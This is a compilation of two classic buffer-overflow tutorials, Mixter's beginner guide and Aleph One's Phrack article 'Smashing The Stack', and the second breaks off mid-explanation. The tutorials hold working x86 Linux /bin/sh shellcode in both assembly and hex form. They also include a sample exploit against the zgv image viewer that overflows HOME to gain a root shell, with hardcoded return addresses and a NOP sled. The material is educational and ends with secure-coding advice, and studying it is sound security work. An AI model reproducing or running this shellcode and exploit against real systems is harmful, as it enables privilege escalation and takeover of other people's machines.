Writing Buffer and Heap Overflow Exploits
The following articles were found on the Web, using the Google search engine
with the keywords "buffer overflow exploit". They were all posted at
http://www.11a.nu/stack/exploit.txt.
A cleaner version of the first article,
in HTML, was posted at
http://www.securiteam.com/securityreviews/5OP0B006UQ.html.
Writing buffer overflow exploits - a tutorial for beginners
===========================================================
Security papers - members.tripod.com/mixtersecurity/papers.html
Buffer overflows in buffers that depend on user input have become one of
the biggest security hazards on the internet and to modern computing
in general. This is because such an error is easy to make at the
programming level, and while it is invisible to a user who does not
understand or cannot obtain the source code, many of these errors are
easy to exploit. This paper attempts to teach the novice to
average C programmer how an overflow condition can be proven to be
exploitable.
Mixter
_______________________________________________________________________________
1. Memory
Note: Memory for a process is organized the way I describe here on most
computers, but the details depend on the processor architecture.
This example is for x86 and also roughly applies to sparc.
The principle of exploiting a buffer overflow is to overwrite parts of
memory which aren't supposed to be overwritten with arbitrary input, and
to make the process execute that input as code. To see how and where an
overflow takes place, let's take a look at how memory is organized. A page
is a part of memory that uses its own relative addressing, meaning the
kernel allocates initial memory for the process, which it can then
access without having to know where the memory is physically located
in RAM. The process's memory consists of three sections:
- code segment, data in this segment are assembler instructions that
the processor executes. The code execution is non-linear, it can skip
code, jump, and call functions on certain conditions. Therefore, we
have a pointer called EIP, or instruction pointer. The address where
EIP points to always contains the code that will be executed next.
- data segment, space for variables and dynamic buffers
- stack segment, which is used to pass data (arguments) to functions
and as a space for variables of functions. The bottom (start) of the
stack usually resides at the very end of the virtual memory of a page,
and grows down. The assembler command PUSHL will add to the top of the
stack, and POPL will remove one item from the top of the stack and put
it in a register. For accessing the stack memory directly, there is
the stack pointer ESP that points at the top (lowest memory address)
of the stack.
_______________________________________________________________________________
2. Functions
A function is a piece of code in the code segment, that is called,
performs a task, and then returns to the previous thread of execution.
Optionally, arguments can be passed to a function. In assembler, it
usually looks like this (very simple example, just to get the idea):
memory address   code
0x8054321        pushl $0x0
0x8054322        call $0x80543a0
0x8054327        ret
0x8054328        leave
...
0x80543a0        popl %eax
0x80543a1        addl $0x1337,%eax
0x80543a4        ret
What happens here? The main function calls function(0); The variable
is 0, main pushes it onto the stack, and calls the function. The
function gets the variable from the stack using popl (this is simplified:
in real code the return address lies on top of the argument, so the
argument is read relative to ESP or EBP instead). After
finishing, it returns to 0x8054327. Commonly, the called function would
first push register EBP onto the stack and restore it after
finishing. This is the frame pointer concept, which
allows the function to use its own offsets for addressing. It is mostly
uninteresting while dealing with exploits, because the function will
not return to the original execution thread anyway. :-) We just have
to know what the stack looks like. At the top, we have the internal
buffers and variables of the function. After this, there is the saved
EBP register (32 bit, which is 4 bytes), and then the return address,
which is again 4 bytes. Further down, there are the arguments passed
to the function, which are uninteresting to us. In this case, our
return address is 0x8054327. It is automatically stored on the stack
when the function is called. This return address can be overwritten,
and changed to point to any point in memory, if there is an overflow
somewhere in the code.
_______________________________________________________________________________
3. Example of an exploitable program
Let's assume that we exploit a function like this:
void lame (void) { char small[30]; gets (small); printf("%s\n", small); }
main() { lame (); return 0; }
Compile and disassemble it:
# cc -ggdb blah.c -o blah
/tmp/cca017401.o: In function `lame':
/root/blah.c:1: the `gets' function is dangerous and should not be used.
# gdb blah
/* short explanation: gdb, the GNU debugger is used here to read the
binary file and disassemble it (translate bytes to assembler code) */
(gdb) disas main
Dump of assembler code for function main:
0x80484c8 <main>:     pushl %ebp
0x80484c9 <main+1>:   movl %esp,%ebp
0x80484cb <main+3>:   call 0x80484a0 <lame>
0x80484d0 <main+8>:   leave
0x80484d1 <main+9>:   ret
(gdb) disas lame
Dump of assembler code for function lame:
/* saving the frame pointer onto the stack right before the ret address */
0x80484a0 <lame>:     pushl %ebp
0x80484a1 <lame+1>:   movl %esp,%ebp
/* enlarge the stack by 0x20 or 32. our buffer is 30 characters, but the
memory is allocated 4byte-wise (because the processor uses 32bit words)
this is the equivalent to: char small[30]; */
0x80484a3 <lame+3>:   subl $0x20,%esp
/* load a pointer to small[30] (the space on the stack, which is located
at virtual address 0xffffffe0(%ebp)) on the stack, and call
the gets function: gets(small); */
0x80484a6 <lame+6>:   leal 0xffffffe0(%ebp),%eax
0x80484a9 <lame+9>:   pushl %eax
0x80484aa <lame+10>:  call 0x80483ec <gets>
0x80484af <lame+15>:  addl $0x4,%esp
/* load the address of small and the address of "%s\n" string on stack
and call the print function: printf("%s\n", small); */
0x80484b2 <lame+18>:  leal 0xffffffe0(%ebp),%eax
0x80484b5 <lame+21>:  pushl %eax
0x80484b6 <lame+22>:  pushl $0x804852c
0x80484bb <lame+27>:  call 0x80483dc <printf>
0x80484c0 <lame+32>:  addl $0x8,%esp
/* get the return address, 0x80484d0, from stack and return to that address.
you don't see that explicitly here because it is done by the CPU as 'ret' */
0x80484c3 <lame+35>:  leave
0x80484c4 <lame+36>:  ret
End of assembler dump.
3a. Overflowing the program
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Segmentation fault (core dumped)
# gdb blah core
(gdb) info registers
eax: 0x24 36
ecx: 0x804852f 134513967
edx: 0x1 1
ebx: 0x11a3c8 1156040
esp: 0xbffffdb8 -1073742408
ebp: 0x787878 7895160
^^^^^^
EBP is 0x787878, which means that we have written more data onto the
stack than the input buffer could handle. 0x78 is the hex
representation of 'x'. The process had a buffer of 32 bytes maximum
size. Our 35 characters plus the terminating zero byte filled those 32
bytes and overwrote the 4 bytes of the saved EBP right behind them,
which is why EBP now reads 0x787878. The process got a segmentation
fault once it used the corrupted frame pointer. A few more characters
of input would overwrite the return address as well.
3b. Changing the return address
Let's try to exploit the program so that it returns into the call to
lame() again instead of returning normally.
We have to change the return address 0x80484d0 to 0x80484cb, that is all.
In memory, we have: 32 bytes buffer space | 4 bytes saved EBP | 4
bytes RET. Here is a simple program to put the 4-byte return address
into a 1-byte character buffer:
main()
{
int i=0; char buf[44];
for (i=0;i<=40;i+=4)
*(long *) &buf[i] = 0x80484cb;
puts(buf);
}
# ret
ËËËËËËËËËËË,
# (ret;cat)|./blah
test <- user input
ËËËËËËËËËËË,test
test <- user input
test
Here we are, the program went through the function two times.
If an overflow is present, the return address of functions can be
changed to alter the program's execution thread.
_______________________________________________________________________________
4. Shellcode
To keep it simple, shellcode is simply assembler commands, which we
write on the stack and then change the return address to return to the
stack. Using this method, we can insert code into a vulnerable process
and then execute it right on the stack. So, let's generate insertable
assembler code to run a shell. A common system call is execve(), which
loads and runs any binary, terminating execution of the current
process. The manpage gives us the usage:
int execve (const char *filename, char *const argv [], char *const envp[]);
Let's get the details of the system call from glibc2:
# gdb /lib/libc.so.6
(gdb) disas execve
Dump of assembler code for function execve:
0x5da00 : pushl %ebx
/* this is the actual syscall. before a program would call execve, it would
push the arguments in reverse order on the stack: **envp, **argv, *filename */
/* put address of **envp into edx register */
0x5da01 : movl 0x10(%esp,1),%edx
/* put address of **argv into ecx register */
0x5da05 : movl 0xc(%esp,1),%ecx
/* put address of *filename into ebx register */
0x5da09 : movl 0x8(%esp,1),%ebx
/* put 0xb in eax register; 0xb == execve in the internal system call table */
0x5da0d : movl $0xb,%eax
/* give control to kernel, to execute execve instruction */
0x5da12 : int $0x80
0x5da14 : popl %ebx
0x5da15 : cmpl $0xfffff001,%eax
0x5da1a : jae 0x5da1d <__syscall_error>
0x5da1c : ret
End of assembler dump.
4a. making the code portable
We have to apply a trick to be able to make shellcode without having
to reference the arguments in memory the conventional way, by giving
their exact address on the memory page, which can only be done at
compile time. Once we can estimate the size of the shellcode, we can
use the instructions jmp and call to go a specified
number of bytes back or forth in the execution thread. Why use a call?
We have the opportunity that a CALL will automatically store the
return address on the stack, the return address being the next 4 bytes
after the CALL instruction. By placing a variable right behind the
call, we indirectly push its address on the stack without having to
know it.
0 jmp (skip Z bytes forward)
2 popl %esi
... put function(s) here ...
Z call <-Z+2> (skip 2 less than Z bytes backward, to POPL)
Z+5 .string (first variable)
(Note: If you're going to write code more complex than for spawning a
simple shell, you can put more than one .string behind the code. You
know the size of those strings and can therefore calculate their
relative locations once you know where the first string is located.)
4b. the shellcode
global code_start /* we'll need this later, dont mind it */
global code_end
.data
code_start:
jmp 0x17
popl %esi
movl %esi,0x8(%esi) /* put address of **argv behind shellcode,
0x8 bytes behind it so a /bin/sh has place */
xorl %eax,%eax /* put 0 in %eax */
movb %eax,0x7(%esi) /* put terminating 0 after /bin/sh string */
movl %eax,0xc(%esi) /* another 0 to get the size of a long word */
my_execve:
movb $0xb,%al /* execve( */
movl %esi,%ebx /* "/bin/sh", */
leal 0x8(%esi),%ecx /* & of "/bin/sh", */
xorl %edx,%edx /* NULL */
int $0x80 /* ); */
call -0x1c
.string "/bin/shX" /* X is overwritten by movb %eax,0x7(%esi) */
code_end:
(The relative offsets 0x17 and -0x1c can be gained by putting in 0x0,
compiling, disassembling and then looking at the shell codes size.)
This is already working shellcode, though very minimal. You should at
least disassemble the exit() syscall and attach it (before the
'call'). The real art of making shellcode also consists of avoiding
any binary zeroes in the code (indicates end of input/buffer very
often) and modify it for example, so the binary code does not contain
control or lower characters, which would get filtered out by some
vulnerable programs. Most of this stuff is done by self-modifying
code, like we had in the movb %eax,0x7(%esi) instruction. We replaced
the X with \0, but without having a \0 in the shellcode initially...
Let's test this code... save the above code as code.S (remove comments)
and the following file as code.c:
extern void code_start();
extern void code_end();
#include
main() { ((void (*)(void)) code_start)(); }
# cc -o code code.S code.c
# ./code
bash#
You can now convert the shellcode to a hex char buffer. The best way to
do this is to print it out:
#include <stdio.h>
extern void code_start(); extern void code_end();
main() { fprintf(stderr,"%s",code_start); }
and parse it through aconv -h or bin2c.pl, those tools can be found at:
http://www.dec.net/~dhg or http://members.tripod.com/mixtersecurity
_______________________________________________________________________________
5. Writing an exploit
Let us take a look at how to change the return address to point to
shellcode put on the stack, and write a sample exploit. We will take
zgv, because that is one of the easiest things to exploit out there :)
# export HOME=`perl -e 'printf "a" x 2000'`
# zgv
Segmentation fault (core dumped)
# gdb /usr/bin/zgv core
#0 0x61616161 in ?? ()
(gdb) info register esp
esp: 0xbffff574 -1073744524
Well, this is the top of the stack at crash time. It is safe to
presume that we can use this as return address to our shellcode.
We will now add some NOP (no operation) instructions before our
buffer, so we don't have to be 100% correct regarding the prediction
of the exact start of our shellcode in memory (or even brute forcing
it). The function will return onto the stack somewhere before our
shellcode, work its way through the NOPs to the initial JMP command,
jump to the CALL, jump back to the popl, and run our code on the
stack.
Remember, the stack looks like this: at the lowest memory address, the
top of the stack where ESP points to, the initial variables are
stored, namely the buffer in zgv that stores the HOME environment
variable. After that, we have the saved EBP(4bytes) and the return
address of the previous function. We must write 8 bytes or more behind
the buffer to overwrite the return address with our new address on the
stack.
The buffer in zgv is 1024 bytes big. You can find that out by glancing
at the code, or by searching for the initial subl $0x400,%esp (=1024)
in the vulnerable function. We will now put all those parts together
in the exploit:
5a. Sample zgv exploit
/* zgv v3.0 exploit by Mixter
buffer overflow tutorial - http://1337.tsx.org
sample exploit, works for example with precompiled
redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */
#include
#include
#include
/* This is the minimal shellcode from the tutorial */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
#define NOP 0x90
#define LEN 1032
#define RET 0xbffff574
int main()
{
char buffer[LEN];
long retaddr = RET;
int i;
fprintf(stderr,"using address 0x%lx\n",retaddr);
/* this fills the whole buffer with the return address, see 3b) */
for (i=0;i
[...]
function() -> strcpy(smallbuffer,getenv("HOME"));
At this point, zgv fails to do bounds checking, writes beyond
smallbuffer, and the return address to main is overwritten with the
return address on the stack. function() does leave/ret and the EIP
points onto the stack:
0xbffff574 nop
0xbffff575 nop
0xbffff576 nop
0xbffff577 jmp $0x24 1
0xbffff579 popl %esi 3 <--\ |
[... shellcode starts here ...] | |
0xbffff59b call -$0x1c 2 <--/
0xbffff59e .string "/bin/shX"
Let's test the exploit...
# cc -o zgx zgx.c
# ./zgx
using address 0xbffff574
bash#
5b. further tips on writing exploits
There are a lot of programs which are tough to exploit, but
nonetheless vulnerable. However, there are a lot of tricks you can use
to get around filtering and such. There are also other overflow
techniques which do not necessarily involve changing the return
address at all, or not only the return address. There are so-called pointer
overflows, where a pointer that a function allocates can be
overwritten by an overflow, altering the program's execution flow (an
example is the RoTShB bind 4.9 exploit), and exploits where the return
address points to the shell's environment pointer, where the shellcode
is located instead of being on the stack (this defeats very small
buffers and non-executable stack patches, and can fool some security
programs, though it can only be performed locally). Another important
subject for the skilled shellcode author is radically self-modifying
code, which initially only consists of printable, non-white upper case
characters, and then modifies itself to put functional shellcode on
the stack which it executes, etc. You should never, ever have any
binary zeroes in your shell code, because it will most probably not
work if it contains any. But discussing how to substitute certain
assembler commands with others would go beyond the scope of this
paper. I also suggest reading the other great overflow howtos out
there, written by aleph1, Taeoh Oh and mudge.
5c. important note
You will NOT be able to use this tutorial on Windows or Macintosh. Do
NOT ask me for cc.exe and gdb.exe either! =oP
_______________________________________________________________________________
6. Conclusions
We have learned that once an overflow is present which is user
dependent, it can be exploited about 90% of the time, even though
exploiting some situations is difficult and takes some skill. Why is
it important to write exploits? Because ignorance is omnipresent in the
software industry. There have already been reports of vulnerabilities
due to buffer overflows in software, though the software has not been
updated, or the majority of users didn't update, because the
vulnerability was hard to exploit and nobody believed it created a
security risk. Then, an exploit actually comes out, proves that the
program is exploitable in practice, and there is usually
a big (necessary) hurry to update it.
As for the programmer (you), it is a hard task to write secure
programs, but it should be taken very seriously. This is an especially
large concern when writing servers, any type of security programs, or
programs that are suid root, or designed to be run by root, any
special accounts, or the system itself. The main principles I suggest
are: apply bounds checking (strn* and sn* functions instead of sprintf
etc.), prefer allocating buffers of a dynamic, input-dependent size, be
careful with for/while/etc. loops that gather data and stuff it into a
buffer, and generally handle user input with great care.
The security industry has also made a notable effort to
prevent overflow problems with techniques like non-executable stack,
suid wrappers, guard programs that check return addresses, bounds
checking compilers, and so on. You should make use of those techniques
where possible, but do not fully rely on them. Do not assume you are
safe at all if you run a vanilla two-year-old UNIX distribution
without updates but with overflow protection or (even more stupid)
firewalling/IDS. These cannot assure security if you continue to use
insecure programs, because _all_ security programs are _software_ and
can contain vulnerabilities themselves, or at least not be perfect. If
you apply frequent updates _and_ security measures, you can still not
expect to be secure, _but_ you can hope. :-)
Mixter
http://members.tripod.com/mixtersecurity
.oO Phrack 49 Oo.
Volume Seven, Issue Forty-Nine
File 14 of 16
BugTraq, r00t, and Underground.Org
bring you
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Smashing The Stack For Fun And Profit
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
by Aleph One
aleph1@underground.org
`smash the stack` [C programming] n. On many C implementations
it is possible to corrupt the execution stack by writing past
the end of an array declared auto in a routine. Code that does
this is said to smash the stack, and can cause return from the
routine to jump to a random address. This can produce some of
the most insidious data-dependent bugs known to mankind.
Variants include trash the stack, scribble the stack, mangle
the stack; the term mung the stack is not used, as this is
never done intentionally. See spam; see also alias bug,
fandango on core, memory leak, precedence lossage, overrun screw.
Introduction
~~~~~~~~~~~~
Over the last few months there has been a large increase of buffer
overflow vulnerabilities being both discovered and exploited. Examples
of these are syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt
library, at, etc. This paper attempts to explain what buffer overflows
are, and how their exploits work.
Basic knowledge of assembly is required. An understanding of virtual
memory concepts, and experience with gdb are very helpful but not necessary.
We also assume we are working with an Intel x86 CPU, and that the operating
system is Linux.
Some basic definitions before we begin: A buffer is simply a contiguous
block of computer memory that holds multiple instances of the same data
type. C programmers normally associate the word buffer with arrays, most
commonly character arrays. Arrays, like all variables in C, can be
declared either static or dynamic. Static variables are allocated at load
time on the data segment. Dynamic variables are allocated at run time on
the stack. To overflow is to flow, or fill over the top, brims, or bounds.
We will concern ourselves only with the overflow of dynamic buffers, otherwise
known as stack-based buffer overflows.
Process Memory Organization
~~~~~~~~~~~~~~~~~~~~~~~~~~~
To understand what stack buffers are we must first understand how a
process is organized in memory. Processes are divided into three regions:
Text, Data, and Stack. We will concentrate on the stack region, but first
a small overview of the other regions is in order.
The text region is fixed by the program and includes code (instructions)
and read-only data. This region corresponds to the text section of the
executable file. This region is normally marked read-only and any attempt to
write to it will result in a segmentation violation.
The data region contains initialized and uninitialized data. Static
variables are stored in this region. The data region corresponds to the
data-bss sections of the executable file. Its size can be changed with the
brk(2) system call. If the expansion of the bss data or the user stack
exhausts available memory, the process is blocked and is rescheduled to
run again with a larger memory space. New memory is added between the data
and stack segments.
          /------------------\  lower
          |                  |  memory
          |       Text       |  addresses
          |                  |
          |------------------|
          |   (Initialized)  |
          |        Data      |
          |  (Uninitialized) |
          |------------------|
          |                  |
          |       Stack      |  higher
          |                  |  memory
          \------------------/  addresses
Fig. 1 Process Memory Regions
What Is A Stack?
~~~~~~~~~~~~~~~~
A stack is an abstract data type frequently used in computer science. A
stack of objects has the property that the last object placed on the stack
will be the first object removed. This property is commonly referred to as
last in, first out queue, or a LIFO.
Several operations are defined on stacks. Two of the most important are
PUSH and POP. PUSH adds an element at the top of the stack. POP, in
contrast, reduces the stack size by one by removing the last element at the
top of the stack.
Why Do We Use A Stack?
~~~~~~~~~~~~~~~~~~~~~~
Modern computers are designed with the need of high-level languages in
mind. The most important technique for structuring programs introduced by
high-level languages is the procedure or function. From one point of view, a
procedure call alters the flow of control just as a jump does, but unlike a
jump, when finished performing its task, a function returns control to the
statement or instruction following the call. This high-level abstraction
is implemented with the help of the stack.
The stack is also used to dynamically allocate the local variables used in
functions, to pass parameters to the functions, and to return values from the
function.
The Stack Region
~~~~~~~~~~~~~~~~
A stack is a contiguous block of memory containing data. A register called
the stack pointer (SP) points to the top of the stack. The bottom of the
stack is at a fixed address. Its size is dynamically adjusted by the kernel
at run time. The CPU implements instructions to PUSH onto and POP off of the
stack.
The stack consists of logical stack frames that are pushed when calling a
function and popped when returning. A stack frame contains the parameters to
a function, its local variables, and the data necessary to recover the
previous stack frame, including the value of the instruction pointer at the
time of the function call.
Depending on the implementation the stack will either grow down (towards
lower memory addresses), or up. In our examples we'll use a stack that grows
down. This is the way the stack grows on many computers including the Intel,
Motorola, SPARC and MIPS processors. The stack pointer (SP) is also
implementation dependent. It may point to the last address on the stack, or
to the next free available address after the stack. For our discussion we'll
assume it points to the last address on the stack.
In addition to the stack pointer, which points to the top of the stack
(lowest numerical address), it is often convenient to have a frame pointer
(FP) which points to a fixed location within a frame. Some texts also refer
to it as a local base pointer (LB). In principle, local variables could be
referenced by giving their offsets from SP. However, as words are pushed onto
the stack and popped from the stack, these offsets change. Although in some
cases the compiler can keep track of the number of words on the stack and
thus correct the offsets, in some cases it cannot, and in all cases
considerable administration is required. Furthermore, on some machines, such
as Intel-based processors, accessing a variable at a known distance from SP
requires multiple instructions.
Consequently, many compilers use a second register, FP, for referencing
both local variables and parameters because their distances from FP do
not change with PUSHes and POPs. On Intel CPUs, BP (EBP) is used for this
purpose. On the Motorola CPUs, any address register except A7 (the stack
pointer) will do. Because of the way our stack grows, actual parameters have
positive offsets and local variables have negative offsets from FP.
The first thing a procedure must do when called is save the previous FP
(so it can be restored at procedure exit). Then it copies SP into FP to
create the new FP, and advances SP to reserve space for the local variables.
This code is called the procedure prolog. Upon procedure exit, the stack
must be cleaned up again, something called the procedure epilog. The Intel
ENTER and LEAVE instructions and the Motorola LINK and UNLINK instructions,
have been provided to do most of the procedure prolog and epilog work
efficiently.
Let us see what the stack looks like in a simple example:
example1.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
}
void main() {
function(1,2,3);
}
------------------------------------------------------------------------------
To understand what the program does to call function() we compile it with
gcc using the -S switch to generate assembly code output:
$ gcc -S -o example1.s example1.c
By looking at the assembly language output we see that the call to
function() is translated to:
pushl $3
pushl $2
pushl $1
call function
This pushes the 3 arguments to function backwards into the stack, and
calls function(). The instruction 'call' will push the instruction pointer
(IP) onto the stack. We'll call the saved IP the return address (RET). The
first thing done in function is the procedure prolog:
pushl %ebp
movl %esp,%ebp
subl $20,%esp
This pushes EBP, the frame pointer, onto the stack. It then copies the
current SP onto EBP, making it the new FP pointer. We'll call the saved FP
pointer SFP. It then allocates space for the local variables by subtracting
their size from SP.
We must remember that stack space for local variables is allocated in
multiples of the word size. A word in our case is 4 bytes, or 32 bits. So
our 5 byte buffer is really going to take 8 bytes (2 words) of memory, and
our 10 byte buffer is going to take 12 bytes (3 words) of memory. That is
why SP is being subtracted by 20. With that in mind our stack looks like
this when function() is called (each space represents a byte):
bottom of                                                            top of
memory                                                               memory
           buffer2       buffer1   sfp   ret   a     b     c
<------   [            ][        ][    ][    ][    ][    ][    ]
top of                                                            bottom of
stack                                                                 stack
Buffer Overflows
~~~~~~~~~~~~~~~~
A buffer overflow is the result of stuffing more data into a buffer than
it can handle. How can this often found programming error be taken
advantage of to execute arbitrary code? Let's look at another example:
example2.c
------------------------------------------------------------------------------
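#include <string.h>
void function(char *str) {
   char buffer[16];
   strcpy(buffer,str);   /* no bounds check: copies until the null character */
}
void main() {
   char large_string[256];
   int i;
   for( i = 0; i < 255; i++)
      large_string[i] = 'A';
   large_string[255] = '\0';   /* terminate the string so strcpy() stops here */
   function(large_string);
}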
------------------------------------------------------------------------------
This program has a function with a typical buffer overflow coding
error. The function copies a supplied string without bounds checking by
using strcpy() instead of strncpy(). If you run this program you will get a
segmentation violation. Let's see what its stack looks like when we call function:
bottom of                                                            top of
memory                                                               memory
                  buffer            sfp   ret   *str
<------          [                ][    ][    ][    ]
top of                                                            bottom of
stack                                                                 stack
What is going on here? Why do we get a segmentation violation? Simple.
strcpy() is copying the contents of *str (large_string[]) into buffer[]
until a null character is found in the string. As we can see buffer[] is
much smaller than *str. buffer[] is 16 bytes long, and we are trying to stuff
it with 256 bytes. This means that all 240 bytes after buffer in the stack
are being overwritten. This includes the SFP, RET, and even *str! We had
filled large_string with the character 'A'. Its hex character value
is 0x41. That means that the return address is now 0x41414141. This is
outside of the process address space. That is why when the function returns
and tries to read the next instruction from that address you get a
segmentation violation.
So a buffer overflow allows us to change the return address of a function.
In this way we can change the flow of execution of the program. Let's go back
to our first example and recall what the stack looked like:
bottom of                                                            top of
memory                                                               memory
           buffer2       buffer1   sfp   ret   a     b     c
<------   [            ][        ][    ][    ][    ][    ][    ]
top of                                                            bottom of
stack                                                                 stack
Let's try to modify our first example so that it overwrites the return
address, and demonstrate how we can make it execute arbitrary code. Just
before buffer1[] on the stack is SFP, and before it, the return address.
That is 4 bytes past the end of buffer1[]. But remember that buffer1[] is
really 2 words, so it's 8 bytes long. So the return address is 12 bytes from
the start of buffer1[]. We'll modify the return value in such a way that the
assignment statement 'x = 1;' after the function call will be jumped over. To
do so we add 8 bytes to the return address. Our code is now:
example3.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 12;
(*ret) += 8;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
------------------------------------------------------------------------------
What we have done is add 12 to buffer1[]'s address. This new address is
where the return address is stored. We want to skip past the assignment to
the printf call. How did we know to add 8 to the return address? We used a
test value first (for example 1), compiled the program, and then started gdb:
------------------------------------------------------------------------------
[aleph1]$ gdb example3
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000490 : pushl %ebp
0x8000491 : movl %esp,%ebp
0x8000493 : subl $0x4,%esp
0x8000496 : movl $0x0,0xfffffffc(%ebp)
0x800049d : pushl $0x3
0x800049f : pushl $0x2
0x80004a1 : pushl $0x1
0x80004a3 : call 0x8000470
0x80004a8 : addl $0xc,%esp
0x80004ab : movl $0x1,0xfffffffc(%ebp)
0x80004b2 : movl 0xfffffffc(%ebp),%eax
0x80004b5 : pushl %eax
0x80004b6 : pushl $0x80004f8
0x80004bb : call 0x8000378
0x80004c0 : addl $0x8,%esp
0x80004c3 : movl %ebp,%esp
0x80004c5 : popl %ebp
0x80004c6 : ret
0x80004c7 : nop
------------------------------------------------------------------------------
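We can see that when calling function() the RET will be 0x80004a8, and we
want to jump past the assignment at 0x80004ab. The next instruction we want
to execute is the one at 0x80004b2. A little math on this listing gives the
distance: 0x80004b2 - 0x80004a8 = 0xa, or 10 bytes. The exact value depends
on the code your compiler emits, so check it against your own disassembly.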
Shell Code
~~~~~~~~~~
So now that we know that we can modify the return address and the flow of
execution, what program do we want to execute? In most cases we'll simply
want the program to spawn a shell. From the shell we can then issue other
commands as we wish. But what if there is no such code in the program we
are trying to exploit? How can we place arbitrary instructions into its
address space? The answer is to place the code we are trying to execute in
the buffer we are overflowing, and overwrite the return address so it points
back into the buffer. Assuming the stack starts at address 0xFF, and that S
stands for the code we want to execute, the stack would then look like this:
bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c
<------   [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
           ^                            |
           |____________________________|
top of                                                            bottom of
stack                                                                 stack
The code to spawn a shell in C looks like:
shellcode.c
-----------------------------------------------------------------------------
#include <stdio.h>
#include <unistd.h>
void main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
------------------------------------------------------------------------------
To find out what it looks like in assembly we compile it, and start
up gdb. Remember to use the -static flag. Otherwise the actual code
for the execve system call will not be included. Instead there will be a
reference to the dynamic C library that would normally be linked in at
load time.
------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcode -ggdb -static shellcode.c
[aleph1]$ gdb shellcode
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 : pushl %ebp
0x8000131 : movl %esp,%ebp
0x8000133 : subl $0x8,%esp
0x8000136 : movl $0x80027b8,0xfffffff8(%ebp)
0x800013d : movl $0x0,0xfffffffc(%ebp)
0x8000144 : pushl $0x0
0x8000146 : leal 0xfffffff8(%ebp),%eax
0x8000149 : pushl %eax
0x800014a : movl 0xfffffff8(%ebp),%eax
0x800014d : pushl %eax
0x800014e : call 0x80002bc <__execve>
0x8000153 : addl $0xc,%esp
0x8000156 : movl %ebp,%esp
0x8000158 : popl %ebp
0x8000159 : ret
End of assembler dump.
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
0x80002c0 <__execve+4>: movl $0xb,%eax
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
0x80002ce <__execve+18>: int $0x80
0x80002d0 <__execve+20>: movl %eax,%edx
0x80002d2 <__execve+22>: testl %edx,%edx
0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>
0x80002d6 <__execve+26>: negl %edx
0x80002d8 <__execve+28>: pushl %edx
0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>: popl %edx
0x80002df <__execve+35>: movl %edx,(%eax)
0x80002e1 <__execve+37>: movl $0xffffffff,%eax
0x80002e6 <__execve+42>: popl %ebx
0x80002e7 <__execve+43>: movl %ebp,%esp
0x80002e9 <__execve+45>: popl %ebp
0x80002ea <__execve+46>: ret
0x80002eb <__execve+47>: nop
End of assembler dump.
------------------------------------------------------------------------------
Let's try to understand what is going on here. We'll start by studying main:
------------------------------------------------------------------------------
0x8000130 : pushl %ebp
0x8000131 : movl %esp,%ebp
0x8000133 : subl $0x8,%esp
This is the procedure prelude. It first saves the old frame pointer,
makes the current stack pointer the new frame pointer, and leaves
space for the local variables. In this case it's:
char *name[2];
or 2 pointers to a char. Pointers are a word long, so it leaves
space for two words (8 bytes).
0x8000136 : movl $0x80027b8,0xfffffff8(%ebp)
We copy the value 0x80027b8 (the address of the string "/bin/sh")
into the first pointer of name[]. This is equivalent to:
name[0] = "/bin/sh";
0x800013d : movl $0x0,0xfffffffc(%ebp)
We copy the value 0x0 (NULL) into the second pointer of name[].
This is equivalent to:
name[1] = NULL;
The actual call to execve() starts here.
0x8000144 : pushl $0x0
We push the arguments to execve() in reverse order onto the stack.
We start with NULL.
0x8000146 : leal 0xfffffff8(%ebp),%eax
We load the address of name[] into the EAX register.
0x8000149 : pushl %eax
We push the address of name[] onto the stack.
0x800014a : movl 0xfffffff8(%ebp),%eax
We load the address of the string "/bin/sh" into the EAX register.
0x800014d : pushl %eax
We push the address of the string "/bin/sh" onto the stack.
0x800014e : call 0x80002bc <__execve>
Call the library procedure execve(). The call instruction pushes the
IP onto the stack.
------------------------------------------------------------------------------
Now execve(). Keep in mind we are using an Intel-based Linux system. The
syscall details will change from OS to OS, and from CPU to CPU. Some will
